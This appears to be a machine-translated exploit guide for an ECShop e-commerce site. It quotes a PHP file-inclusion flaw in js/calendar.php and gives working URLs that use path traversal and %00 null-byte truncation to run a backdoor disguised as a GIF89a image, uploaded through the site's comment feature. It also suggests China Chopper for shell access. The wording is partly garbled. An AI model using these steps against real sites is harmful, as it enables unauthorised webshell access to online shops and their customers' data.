Looking directly at the code:
$lang = (! empty($_GET['lang']))
? trim($_GET['lang']) : ‘EN’;//no filter, obviously contains a vulnerability
if (! file_exists(‘../languages/’ . $lang . ‘/calendar.php’))
$lang = ‘EN’;
require(dirname(dirname(FILE)) . ‘/data/config.php’);
the include_once(‘../languages/’ . $lang . ‘/calendar.php’);//included here, and need to be truncated
Some time ago, has been hovering in the ecshop website above. Later found the side door of the vulnerability can take the SHELL, simply use the way.
Forged a gif89a header GIF Backdoor file cheat, then register for the Mall account, in the I want to comment there, leave a message upload images, and then use the included directly to get the SHELL to!
Online exp the Url is like this: http://www.*. com/js/calendar. php? lang=../data/feedbackimg/6_20101228vyrpbg. gif%0 0.
Want to take the SHELL you just point the back plus a php, very simple so that you can identify as a php file executing the script.
Such as: js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00./1.php
Directly js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00.php you can also!
Open your upload the gif pseudo-image after the above vulnerability is to construct the URL <appear E hereinafter the success of the> <appears in Chinese, it fails>
By the way, if you use pop to download, suggest you use a chopper connected. Comparing convenient!
（Pop-up download in Before is not. Might upgrade to a~ however, this vulnerability has no impact on.
If you message the page looking for not the words in the root directory added: user. php? act=message_list
Open this page then you can not use.